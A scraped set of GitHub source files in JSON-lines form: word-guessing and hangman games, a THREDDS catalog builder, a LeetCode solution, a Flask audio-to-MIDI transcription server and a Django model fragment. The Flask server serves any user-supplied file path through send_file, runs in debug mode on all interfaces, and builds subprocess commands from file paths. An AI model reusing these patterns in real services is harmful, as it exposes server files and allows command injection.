Admin'","repo_name":"mattjegan/KVRX-Website","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41133462986","text":"\r\n\r\n# Use a dictionary\r\n#\r\nimport random\r\n\r\npoints = 0\r\ntries = 0\r\n\r\nwords = {\r\n \"Love\" :[\"A word for affection.\", \"A feeling of compassion.\", \"A feeling of great interest in something.\", \"A romantic feeling.\"],\r\n \"Endgame\" :[\"The highest grossing movie of all time.\", \"The last movie of one the most watched movie series.\", \"Pepperony's last movie together.\", \"'If I tell you, it wont happen.'\"],\r\n \"Sia\" :[\"He/she is the inspiration of the movie 'Music'.\", \"He/She sang 'Move you body'.\", \"He/She sang 'Elastic heart'.\", \"In his or her song, 'I don't need money.'\"],\r\n \"Church\" :[\"The body of Christ.\", \"A gathering of people who come to worship God.\", \"A place of worship.\", \"The house of God.\"],\r\n \"Gay\" :[\"To be extremely happy.\", \"To be attracted to the same sex.\", \"To be in a romantic relationship with the same sex.\", \"It has the letter 'y'.\"],\r\n \"Game\" :[\"To be ready for something.\", \"To be prepared for something\", \"A state of readiness.\", \"To be prepared.\"],\r\n \"Queen\" :[\"The name of a former popular boy-band.\", \"The female head of a monarchy.\", \"Has double letter 'e'.\", \"The wife of a king.\"]\r\n}\r\n\r\nscores = {} \r\n\r\nkeys = []\r\nfor k in words.keys():\r\n keys.append(k)\r\n\r\nuser_valid_plays = []\r\n\r\nword = \"\"\r\nhint = \"\"\r\n\r\ndef set_word():\r\n global words, word, hint, keys, user_valid_plays\r\n word = random.choice(keys)\r\n hint = random.choice(words[word])\r\n user_valid_plays = []\r\n x = 0\r\n\r\ndef 
settings():\r\n global tries\r\n do = input(\"What level of this game do you wish to play:\\n 1. Easy Level\\n 2. Medium Level\\n 3. Hard Level\\n : \")\r\n if do == \"1\":\r\n tries = 5\r\n elif do == \"2\":\r\n tries = 3\r\n elif do == \"3\":\r\n tries = 1\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n settings()\r\n game()\r\n\r\ndef is_complete():\r\n global user_valid_plays, word\r\n for w in word:\r\n if w.lower() not in user_valid_plays:\r\n return False\r\n return True\r\n \r\ndef print_dashes():\r\n global word, user_valid_plays\r\n for i in word:\r\n if i.lower() in user_valid_plays:\r\n print(i,end=\" \")\r\n else:\r\n print(\"_\",end=\" \")\r\n print(\"\")\r\n\r\ndef game(): \r\n global x, points, tries\r\n name = input(\"Input your player name: \")\r\n try:\r\n scores[name]\r\n except:\r\n scores[name] = 0\r\n \r\n attempts = tries\r\n set_word()\r\n print_dashes()\r\n print(\"Hint:\",hint)\r\n while attempts > 0:\r\n if not is_complete():\r\n guess = input(\"Guess a letter in this word: \").strip().lower()\r\n if len(guess) > 1:\r\n attempts = attempts - 1\r\n print(\"Input one letter at a time... You have\",attempts,\"tries left\")\r\n elif guess in word.lower():\r\n user_valid_plays.append(guess)\r\n print(\"This letter is in the word\") \r\n else:\r\n attempts = attempts - 1\r\n print(\"The letter is not a in the word... You have\",attempts,\"tries left\")\r\n if attempts == 0:\r\n print(\"The word is:\",word)\r\n again()\r\n print_dashes()\r\n points = attempts\r\n else:\r\n print(\"CONGRATULATIONS!!!\")\r\n scores[name] += points\r\n again()\r\n \r\n\r\ndef leaderboard():\r\n global points, scores, name\r\n print(\">>>>>LEADERBOARD<<<<<\")\r\n print(\"PLAYER NAME\\t|\\tSCORE\")\r\n \r\n sx = list(scores.values())\r\n \r\n sy = []\r\n for s in sx:\r\n if s not in sy:\r\n sy.append(s)\r\n \r\n sy.sort(reverse=True)\r\n\r\n for y in sy:\r\n for s in scores.items():\r\n if s[1] == y:\r\n print(f\"{s[0]} \\t\\t | \\t {s[1]}\")\r\n #print(scores.items())\r\n \r\ndef again():\r\n global tries, x\r\n again = input(\"Do you wish to:\\n 1. Play again.\\n 2. Go to main menu.\\n 3. Quit\\n : \")\r\n if again == \"1\":\r\n game()\r\n elif again == \"2\":\r\n opt()\r\n elif again == \"3\":\r\n quit()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n\r\ndef addList():\r\n word = input(\"Input the word to be added: \")\r\n hint = input(\"Input the hint to be added: \")\r\n words.update({word: hint})\r\n input(\"Press Enter\")\r\n print(f\"Word: {word} \\t|\\t Hint: {hint}\\n\")\r\n opt()\r\n\r\ndef opt():\r\n global tries, x\r\n do = input(\"Do you wish to:\\n 1. Play a new game.\\n 2. Go to settings.\\n 3. Check leaderboard\\n 4. Add a word\\n : \")\r\n if do == \"1\":\r\n print(\"NOTE: This game will automaticlly start from the easy level.\\nHowever you can change this in settings.\")\r\n input(\"Press Enter\")\r\n tries = 5\r\n game()\r\n elif do == \"2\":\r\n settings()\r\n elif do == \"3\":\r\n leaderboard()\r\n elif do == \"4\":\r\n addList()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. 
No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n \r\n#def name():\r\n #name = input(\"Input your player name: \")\r\n \r\ntry:\r\n print(\">>>>>Guess the Word<<<<<\")\r\n opt()\r\nexcept:\r\n print(\"Code Error... Restart this program\")\r\n input(\"Press Enter\")\r\n opt()\r\n \r\n","repo_name":"mistlebeehyper/Python-Codes","sub_path":"Game 2.py","file_name":"Game 2.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10681054272","text":"# encoding: utf-8\n\"\"\"\n\n\"\"\"\n__author__ = 'Richard Smith'\n__date__ = '25 Feb 2020'\n__copyright__ = 'Copyright 2018 United Kingdom Research and Innovation'\n__license__ = 'BSD - see LICENSE file in top-level package directory'\n__contact__ = 'richard.d.smith@stfc.ac.uk'\n\nfrom tds_utils.create_catalog import CatalogBuilder, AccessMethod, DatasetRoot, AvailableServices, Aggregation, get_catalog_name, CatalogRef\nfrom collections import namedtuple\nimport os\nfrom jinja2 import Environment, PackageLoader\n\n\n# Not used?\nProperty = namedtuple('Property', ('name', 'value'))\nVariable = namedtuple('Variable', ['name', 'vocabulary_name', 'units'])\n\n\nclass Dataset:\n \"\"\"\n Not used?\n \"\"\"\n\n def __init__(self, id, name=None, urlpath=None, properties=[], access_methods=[], size=None):\n self.name = name if name else id\n self.id = id\n self.urlpath = urlpath\n self.properties = properties\n self.access_methods = access_methods\n self.dataSize = size\n\n\nclass CCICatalogBuilder(CatalogBuilder):\n DS_ROOT = 'esg_esacci'\n\n def __init__(self):\n super().__init__()\n self.env = Environment(loader=PackageLoader(\"cci_publisher\", \"templates\"))\n self.env.trim_blocks = True\n self.env.lstrip_blocks = True\n\n def create_dataset(self, result, file_services):\n \"\"\"\n Not used?\n\n :param result:\n :param file_services:\n :return:\n \"\"\"\n this_id = result['name']\n\n # Going from [1:] to remove the first slash\n url_path = os.path.join(self.DS_ROOT, result['directory'][1:], this_id)\n a_meths = [AccessMethod(s, url_path, \"NetCDF-4\") for s in file_services]\n\n size = result['size']\n\n dataset = Dataset(id=this_id, access_methods=a_meths, size=size)\n\n return dataset\n\n def dataset_catalog(self, ds_id, opendap=False):\n \"\"\"\n Build a THREDDS catalog and return the XML as a string\n\n :param ds_id: DRS ID\n :type ds_id: str\n\n :param opendap: Whether or not the service is available via opendap\n :type opendap: bool\n\n :return: XML string\n :rtype: string\n \"\"\"\n # Work out which services are required\n file_services = {AvailableServices.HTTP.value}\n aggregation = None\n\n if opendap:\n file_services.add(AvailableServices.OPENDAP.value)\n\n all_services = file_services.copy()\n\n context = {\n \"services\": all_services,\n \"dataset_id\": ds_id,\n \"aggregation\": aggregation,\n }\n\n return self.render(\"dataset_catalog.xml\", **context)\n\n def root_catalog(self, cat_paths, root_dir, name=\"THREDDS catalog\"):\n \"\"\"\n Build a root-level catalog that links to other catalogs, and return the\n XML as a string\n\n :param cat_paths: paths to dataset xml records\n :type cat_paths: list\n\n :param root_dir: the location of the root catalog.xml\n :type root_dir: str\n\n :param name: name of root catalog\n :type name: str\n\n :return: XML String\n :rtype: str\n \"\"\"\n catalogs = []\n\n for path in cat_paths:\n cat_name = get_catalog_name(path)\n\n # href must be relative to the root catalog itself\n href = 
os.path.relpath(path, start=root_dir)\n catalogs.append(CatalogRef(name=cat_name, title=cat_name,\n href=href))\n\n return self.render(\"root_catalog.xml\", name=name, catalogs=catalogs)","repo_name":"cedadev/cci-publisher","sub_path":"cci_publisher/datasets/create_catalog.py","file_name":"create_catalog.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33364207586","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\n\nclass Solution:\n def __init__(self) :\n self.preorder_index = 0\n self.preorder = None\n\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n\n hashmap = {num : i for i, num in enumerate(inorder)}\n self.preorder = preorder\n\n def _buildTree(left, right) :\n if left > right :\n return\n\n rootval = self.preorder[self.preorder_index]\n root = TreeNode(rootval)\n\n self.preorder_index += 1 \n\n next_right = hashmap[rootval]\n root.left = _buildTree(left, next_right - 1)\n root.right = _buildTree(next_right + 1, right)\n\n return root\n \n return _buildTree(0, len(inorder) - 1)\n","repo_name":"watanka/leetcode","sub_path":"0105-construct-binary-tree-from-preorder-and-inorder-traversal/0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23999047907","text":"from __future__ import unicode_literals\nfrom concurrent.futures import process\nfrom flask import Flask, jsonify, render_template, request,json,send_from_directory, flash, url_for, redirect, session,send_file,redirect\nfrom flask_wtf import FlaskForm\nfrom wtforms import SelectField,HiddenField,SubmitField,FieldList,FormField\nimport vamp\nimport librosa\nimport ffmpeg\nimport os\nimport pyin\nimport subprocess\nimport pretty_midi\nfrom madmom.features.downbeats import DBNDownBeatTrackingProcessor,RNNDownBeatProcessor\nimport pandas as pd\nfrom functools import wraps\nfrom wtforms import Form, BooleanField, TextField, PasswordField, validators,RadioField\nimport gc\nimport math\nimport requests\nimport sys,traceback\nfrom pathlib import Path\nimport pydub\nfrom pydub import AudioSegment\nfrom IPython.display import Audio\nimport numpy as np\nimport scipy as sp\nimport scipy.signal\nfrom scipy.io.wavfile import write\nimport os.path\nimport time\n\n\n# from spleeter.separator import Separator\n\n\napp = Flask(__name__)\napp.config['SESSION_TYPE'] = 'memcached'\napp.config['SECRET_KEY'] = 'pretty secret key'\nUPLOAD_FOLDER = './static/audio_uploads'\nSTEMS_FOLDER = './static/stems'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['STEMS_FOLDER'] = STEMS_FOLDER\n#dev_mode = 'TRUE'\n#print(\"fn \",Flask(__name__))\n\n\n# @app.route('/api/<filepath>/')\n# def api_get_filepath(filepath):\n# return json.jsonify({\n# 'filepath': filepath\n# })\n\ndef separate_stems(filePath,fileName):\n print(\"\\nseparating stems\")\n # sep = Separator('spleeter:2stems')\n print(\"separator ran\")\n # sep.separate_to_file(file_path,output_path,codec='mp3')\n print(\"we do be having issues if this doesnt show\")\n\n outputPath = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/\" + 
fileName.replace(\".wav\", \"\") + \"/bass.wav\"\n\n print(filePath)\n\n # WE USE SUBPROCESS NOW::\n\n demucsCommand = \"demucs -d cpu -n mdx_q \"\n\n subprocess.run(demucsCommand+filePath)\n\n return(outputPath)\n\n # return render_template('play_audio.html',filename=filePath)\n\n\n\n # subprocessCommand = \"spleeter separate -p spleeter:4stems -o output/ \"\n # print(filePath)\n # print(subprocessCommand+filePath)\n # subprocess.run(subprocessCommand+filePath)\n\n # if __name__ == \"__main__\": \n # separator = Separator('spleeter:2stems')\n # separator.separate_to_file(filePath, outputPath)\n # print('sep is running')\n\n # print('subprocess is done now')\n# @app.route(\"/change_audio\")\n# def change_audio(filePath, sample):\n# return filePath, sample\n\n\n#reading in stems from demucs separation\n\ndef bass_stem_definitions(path_to_bass,path_to_orig):\n [stem,sr1] = librosa.load(path_to_bass) #### path for bass stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song\n\n #lowpass filter to remove extraneous signal noise\n lowpass = scipy.signal.butter(2, 5000, 'lowpass', fs=sr1, output='sos')\n filtered = scipy.signal.sosfilt(lowpass, stem)\n return filtered, original,sr1\n\n\ndef vocals_stem_definitions(path_to_vocals,path_to_orig):\n [stem,sr1] = librosa.load(path_to_vocals) #### path for vocals stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song \n\n #highpass filter to remove extraneous signal noise\n highpass = scipy.signal.butter(2, 5000, 'highpass', fs=sr1, output='sos')\n filtered = scipy.signal.sosfilt(highpass, stem)\n return filtered, original,sr1\n\n\n#process single wav pyin\ndef process_video(videoid):\n \n base_fn = videoid \n #decode_fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/stems/bass.wav'\n print(\"base_fn: \", base_fn)\n try:\n data,rate = librosa.load(base_fn)\n except Exception as bad_file:\n print(bad_file)\n return \"failure1\"\n \n melody = vamp.collect(data,rate,\"pyin:pyin\")\n parm = {}\n #plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"mtg-melodia:melodiaviz\",parm)\n plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"pyin:pyin\",parm)\n output_desc = plugin.get_output(5)\n print(\"od\",output_desc)\n output = output_desc[\"identifier\"]\n ff = vamp.frames.frames_from_array(data, step_size, block_size)\n results = vamp.process.process_with_initialised_plugin(ff, rate, step_size, plugin, [output])\n print(\"results:\", results)\n melody_tmp_fn = base_fn + \".lab\"\n print(\"melody_tmp: \", melody_tmp_fn)\n outfile = open(melody_tmp_fn,'w') \n try:\n result = next(results)\n except Exception as ex:\n print(\"failure2\",ex)\n return \"failure3\" \n\n while True:\n \n start = str(result['notes']['timestamp'])\n freq = result['notes']['values'][0]\n note_nbr = midi = str(round(69 + 12*np.log2(freq/440.)))\n duration = str(result['notes']['duration']) \n if result['notes']['values'].shape[0] > 1:\n print(\"multiple notes\",videoid)\n outfile.write(start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n #print(\"??\",start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n try:\n \n result = next(results) \n \n except:\n #outfile.write(start + '\\t' + duration + '\\t' + note_nbr )\n break\n \n outfile.close()\n\n\n #infile = melody_tmp_fn\n #melody_fn = base_fn + '.lab' \n #audio_to_midi_melodia(infile, melody_fn, 95)\n \n \n return melody_tmp_fn\n\n\n#convert pyin to midi\ndef convert_to_midi(note_matrix):\n song1 = pretty_midi.PrettyMIDI()\n # Create 
an Instrument instance for a cello instrument\n song1_program = pretty_midi.instrument_name_to_program('Acoustic Grand Piano')\n piano = pretty_midi.Instrument(program=song1_program)\n for row in note_matrix:\n song_id = row[0]\n note_number = int(row[3])\n start_time = float(row[1])\n end_time = float(row[2])\n note = pretty_midi.Note(velocity=100, pitch=note_number, start=start_time, end=end_time)\n piano.notes.append(note)\n song1.instruments.append(piano)\n # Write out the MIDI data\n song1.write(song_id + '_midi.mid')\n\n return 'success'\n\n#Get song data and beat tracker\ndef get_song_data(track_id,videoid):\n \n print(\"song_id \",track_id)\n base_fn = videoid\n ###### Figure out the name of the file to open based on the track_id supplied\n fn = track_id\n transcription_file = open(fn)\n pitch_vector=[]\n midipitches = ['C','C#','D','Eb','E','F','F#','G','G#','A','Bb','B']\n for row in transcription_file.readlines():\n row = row.split('\\t')\n start_time = float(row[0].strip(\" \"))\n end_time = start_time + float(row[1].strip(\" \"))\n duration = end_time - start_time\n note_nbr = int(row[2].strip(\"\\n\"))\n pcname = midipitches[note_nbr % 12]\n octave = int((note_nbr / 12) + 1)\n pitch_vector.append([start_time,duration,note_nbr,pcname,octave])\n pitchdf = pd.DataFrame(pitch_vector,columns=['start','duration','notenbr','pcname','octave'])\n \n\n beat_vector = []\n nbrbeats = 0\n\n ######need to implement madmom beat tracker to get bpm\n ######read beat tracker file to get beats \n\n #beat_fn = './capstone2/madmombeats/' + videoid.replace(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water\", \"\") + '.lab'\n proc = DBNDownBeatTrackingProcessor(beats_per_bar=[3,4], fps=100)\n act = RNNDownBeatProcessor()(base_fn)\n beatarray = proc(act) \n print(\"out \",beatarray)\n #outfile = open(beat_fn,'w')\n x = 0\n firststart = 0\n\n #for c in beatarray:\n #if x == 0:\n #firststart = c[0]\n #x += 1\n #continue\n #outfile.write(str(np.round(firststart,2)))\n #outfile.write('\\t')\n #firststart = c[0]\n #outfile.write(str(np.round(c[0],2)))\n #outfile.write('\\t')\n #outfile.write(str(np.round(c[1],2)))\n # outfile.write('\\t')\n\n #if x < len(beatarray) -1:\n # outfile.write('\\n')\n # x += 1\n # outfile.close()\n\n \n previous_start = 0\n for row in range(len(beatarray)):\n if row == 0:\n previous_start = float(beatarray[row][0])\n beat_vector.append([float(beatarray[row][0]),float(0),beatarray[row][1],'beat'])\n nbrbeats += 1\n else:\n previous_start = float(beatarray[row-1][0])\n beat_vector.append([float(beatarray[row][0]),float(beatarray[row][0])-previous_start,beatarray[row][1],'beat'])\n nbrbeats += 1\n\n beatdf = pd.DataFrame(beat_vector,columns=['start','duration','metric_pos','type'])\n beatdf['duration'].fillna(value=beatdf.duration.mean)\n songlen = beatdf.start.max() + beatdf.duration.iloc[beatdf.start.idxmax()]\n bpm = nbrbeats / (songlen / 60) \n print(\"songlen \", songlen, bpm)\n \n meanbeat = beatdf['duration'].mean()/4 ##### divide beat into sixteenth notes\n pitchdf['notelen'] = np.ceil(pitchdf['duration'] / meanbeat).astype(int).astype(str) + \"n\"\n pitchdf['16s'] = np.round(pitchdf['start'] / meanbeat)\n pitchdf['notestart'] = np.floor(np.round(pitchdf.start / meanbeat) / 16).astype(int)\n pitchdf['notestart4'] = (np.floor(np.round(pitchdf.start / meanbeat) - (pitchdf.notestart) * 16) / 4).astype(int)\n pitchdf['notestart16'] = (np.round(pitchdf.start / meanbeat) - ((pitchdf.notestart * 16) + (pitchdf.notestart4 * 4 ))).astype(int)\n 
\n    pitchdf['notestartarray'] = pitchdf['notestart'].map(str) + \":\" + pitchdf['notestart4'].map(str) + \":\" + pitchdf['notestart16'].map(str)\n    pitchdf['notename'] = pitchdf['pcname'] + pitchdf['octave'].map(str)\n    notearray = pitchdf[['notestartarray','notename','notelen']].to_numpy()\n    pitchdf['notearray'] = notearray.tolist()\n    print(\"nnn\",pitchdf[['notearray','duration','notelen']].head(10))\n    pitchdf.to_json(base_fn + \"_pitchdf.json\")\n    print (pitchdf)\n    return pitchdf, bpm\n\n\n#if __name__ == '__main__':\n    \n    #outputpath = separate_stems(UPLOAD_FOLDER,)\n    #target_wav = bass_stem_definitions(outputpath,path_to_orig)\n    #target_wav = 'bass.wav'\n    #rc = process_video(target_wav)\n    #print(\"rc\",rc,target_wav)\n\n# if __name__ == \"__main__\":\n#     fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/pyin/basslemon.wav.lab'\n#     transcription_file = open(fn)\n#     note_matrix = []\n#     for row in transcription_file.readlines():\n#         row = row.split('\\t')\n#         song_id = 'bass'\n#         start_time = float(row[0].strip(\" \"))\n#         end_time = start_time + float(row[1].strip(\" \"))\n#         note_nbr = int(row[2].strip(\"\\n\"))\n#         note_matrix.append([song_id,' ',start_time,end_time,note_nbr])\n#     # convert_to_midi(note_matrix)\n\n\n@app.route('/audio_file_name/<path:filePath>')\ndef returnAudioFile(filePath):\n    path_to_audio_file = filePath\n    return send_file(\n        path_to_audio_file, \n        mimetype=\"audio/wav\", \n        as_attachment=True, \n        attachment_filename=\"test.wav\")\n\n@app.route('/upload')\ndef audio_upload():\n    return render_template('upload.html')\n\n@app.route(\"/\")\ndef landing_load():\n    return render_template(\"melody-editor.html\")\n\n@app.route('/explore')\ndef explore():\n    ytid = request.args.get('ytid')\n    if ytid is None:\n        return render_template('melody-editor.html')\n    else:\n        return render_template('melody-editor.html',ytid=ytid)\n    #return render_template('pixi-explore.html')\n\n@app.route('/get_song',methods=['GET', 'POST'])\ndef create_time_series():\n    song_id = request.args.get('song_id')\n    song_title = request.args.get('title')\n    chord_type = request.args.get('chord_type')\n    midi_id = request.args.get('midi_id')\n    print(\"midi id \",midi_id)\n    songtitles,titleoptions = refresh_song_titles()\n    if song_id is None: \n        print(\"using title\")\n        track_id=songtitles.loc[songtitles.loc[:,'Title']==song_title,'ChordinoFN'].values[0]\n    else:\n        track_id=songtitles.loc[songtitles.loc[:,'YoutubeID']==song_id,'ChordinoFN'].values[0]\n    userid = request.args.get('userid')\n    pitchdf,chorddf,secdf,songlen,bpm,beatdf,chordlist = get_song_data(track_id,chord_type,userid,midi_id)\n    firstdownbeat,signature,nbr_sixteenths = get_downbeat(beatdf,chordlist)\n    beatlist = beatdf.start.tolist()\n    nbr_rows = math.ceil(float(len(beatlist)) / (nbr_sixteenths))\n    lyric_lines,lyricdf = get_lyrics(song_id,beatlist,nbr_rows,signature,beatdf)\n    #print(\"ldf\",lyricdf)\n    lyricl = lyricdf.to_dict(orient='records')\n    # if firstdownbeat > 0:\n    #     emptybeats = [\" \" for i in range(signature - firstdownbeat)]\n    #     chordlist = emptybeats + chordlist\n    #     print(\"empty\",emptybeats)\n    print(\"cdf\",pitchdf['notearray'].head())\n    cdictlist = []\n    notelist = pitchdf['notearray'].tolist()\n    chord_tone_array = []\n    note_index = 0\n    note_beat_measure = (int(notelist[note_index][0].split(':')[0]) * signature) + (int(notelist[note_index][0].split(':')[1]))\n    \n    \n    #print(\"chordl\",chordl)\n    pitchl = pitchdf.to_dict(orient='records')\n    secl = secdf.to_dict(orient='records')\n    #print(\"secl \",secl)\n    D = {'data1' : pitchl, 'songlen' : songlen, 'bpm' : bpm,\n         
'downbeat': str(firstdownbeat), 'signature': str(signature),'lyrics': lyricl,'cta' : chord_tone_array}\n \n return jsonify(D)\n\n\n@app.route(\"/edu\")\ndef edu():\n return render_template(\"edu.html\")\n\n\n\n@app.route('/<path:filename>')\ndef serve_static(filename):\n print('serving static')\n root_dir = app.root_path\n print(\"root \",root_dir,app.root_path,app.instance_path)\n filedir = os.path.join(root_dir, 'static/')\n print(filedir,filename)\n return send_from_directory(os.path.join(root_dir, 'static/'), filename)\n\n\n# @app.route('/play_audio')\n# def play_audio():\n# return render_template('play_audio.html')\n\n@app.route('/save_melody',methods=['GET','POST'])\ndef save_melody():\n request_data = request.get_json(silent = True)\n print(\"requestdata: \",request_data)\n melody_data = request_data[\"melody_data\"]\n song_id = request_data[\"song_id\"]\n print(\"songid:\", song_id)\n note_matrix = []\n for x in range(len(melody_data)):\n end_time = melody_data[x][0] + melody_data[x][1]\n note_nbr = melody_data[x][2]\n note_matrix.append([song_id,melody_data[x][0],end_time,note_nbr])\n convert_to_midi(note_matrix)\n return \"success\"\n\n\n@app.route('/save_audio',methods=['GET','POST'])\ndef save_audio():\n print(\"request title\", request.args.get(\"title\"))\n print(\"request type\", request.args.get(\"type\"))\n file_name = request.args.get(\"title\")\n type = request.args.get(\"type\")\n print(\"filename\", file_name)\n print(\"type\", type)\n\n if file_name != None:\n # this saves audio files into the \"audio_uploads\" folder. we will need to delete these in a cache on the webhosting possibly but for now it works fine\n #audio_file = request.files['audio']\n #print('audiofile: ', audio_file.filename)\n #print('newaudiofile: ', audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1))\n\n #file_id=audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1)\n #print(\"fileid\", file_id)\n # file_path = UPLOAD_FOLDER + \"/\" + file_id\n # output_path = STEMS_FOLDER + \"/\" + file_id\n #orig_file_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/audio_uploads/\"+ file_name + \".wav\"\n \n\n #print(\"file path: \", orig_file_path)\n #print(\"output path\", output_path)\n #audio_file.save(orig_file_path) \n\n # convert file to wav for future use\n\n #orig_file_path = '\"' + orig_file_path + '\"'\n\n #output_path = separate_stems(orig_file_path, file_id)\n #output_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav\"\n\n #if \".mp3\" in orig_file_path:\n # print('yes there is mp3 here')\n # sound = AudioSegment.from_mp3(orig_file_path)\n # sound.export(orig_file_path.replace(\".mp3\",\".wav\"), format=\"wav\")\n # file_id = file_id.replace(\".mp3\",\".wav\")\n # orig_file_path = orig_file_path.replace(\".mp3\",\".wav\")\n\n #melody_fn = process_video(output_path)\n #melody_fn = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav.lab\"\n\n #pitch_df,bpm = get_song_data(melody_fn,output_path)\n pitch_df = pd.read_json(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/processed/pitchdf/\" + file_name + \"/\" + type + \".wav_pitchdf.json\")\n \n bpm = pitch_df.bpm.mean()\n print(\"bpm: \", bpm)\n\n #name_of_file=file_id.split(\".\")[0]\n #bass_path = 'separated/mdx_q/'+ name_of_file + '/bass.wav'\n #vocals_path = 'separated/mdx_q/'+ name_of_file + '/vocals.wav'\n\n 
#stereo,sr=binauralizer(alpha,high,bass_path,orig_file_path)\n #binauralized_file_path = 'static/binauralized/' + file_id\n #write(binauralized_file_path,sr,stereo)\n #print(binauralized_file_path)\n pitchl = pitch_df.to_dict(orient='records')\n D = {'data1' : pitchl, 'bpm' : bpm }\n #return render_template('melody-editor.html', ytid=D) \n return jsonify(D) \n \n\n \n # return render_template('play_audio.html', file_path=binauralized_file_path)\n\n\n#testcase \n#process_video(path_to_bass)\n#write(\"stereo.wav\",sr,stereo)\n\n\n\nif __name__ == '__main__':\n #app = Flask(__name__)\n #sess = Session()\n dev_mode = 'TRUE'\n if dev_mode == 'TRUE':\n app.run(host='0.0.0.0',port=8100,debug=True)\n else:\n app.run()\n \n\n\n \n\n \n","repo_name":"dhanson007/MidiMelodyTranscriber","sub_path":"song_upload_server.py","file_name":"song_upload_server.py","file_ext":"py","file_size_in_byte":17683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26663837310","text":"import random\nfrom wordlist import words\nimport string\nimport hangmangraphics\nimport time\nimport sys\n\ndef get_valid_word(words):\n word = random.choice(words)\n while '-' in word or ' ' in word:\n word = random.choice(words)\n return word\n\ndef hangman():\n word = get_valid_word(words).upper()\n word_letters = set(word)\n alphabet = set(string.ascii_uppercase)\n used_letters = set()\n lives = 6\n hangmangraphics.draw_hangman(lives) \n while len(word_letters) > 0 and lives > 0:\n print('You have',lives,' lives and You have used these letters', ' '.join(used_letters))\n\n word_list = [letter if letter in used_letters else '-' for letter in word]\n print('Current word: ', ' '.join(word_list))\n\n user_letter = input('Guess a letter: ').upper()\n if user_letter in alphabet - used_letters:\n used_letters.add(user_letter)\n if user_letter in word_letters:\n word_letters.remove(user_letter)\n else:\n lives = lives - 1\n hangmangraphics.draw_hangman(lives)\n print('this letter is not in the word')\n\n\n elif user_letter in used_letters:\n print('You have used that character before')\n\n else: \n print(\"invalid character, try again\")\n \n if lives == 0:\n print('You didnt guess the word, it was: ',word)\n else:\n print('You guessed it, the word is: ',word,'!')\n\nhangman()\ntime.sleep(5)\nprint(\"Press any key to exit the program\")\ninput()\nexit()","repo_name":"HyperDarkmoon/Hangman-python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27569845367","text":"from django.db import models\nfrom account.models import AccountUser, WorkPlace\nfrom django.urls import reverse\nfrom django.template.defaultfilters import slugify\n\nstatus = (\n ('ass', 'Assigned'),\n ('prog', 'In Progress'),\n ('comp', 'Completed'),\n ('test', 'Testing'),\n ('rev', 'Review'),\n ('appr', 'Approved'),\n ('rel', 'Released')\n)\n\n# Create your models here.\n\nclass Project(models.Model):\n workplace_id = models.ForeignKey(WorkPlace, on_delete=models.CASCADE)\n project_manager = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=255)\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n slug = models.SlugField(null=False, unique=True)\n\n def __str__(self):\n return self.name\n\n def assigned(self):\n var = Status.objects.get(status='ass')\n return 
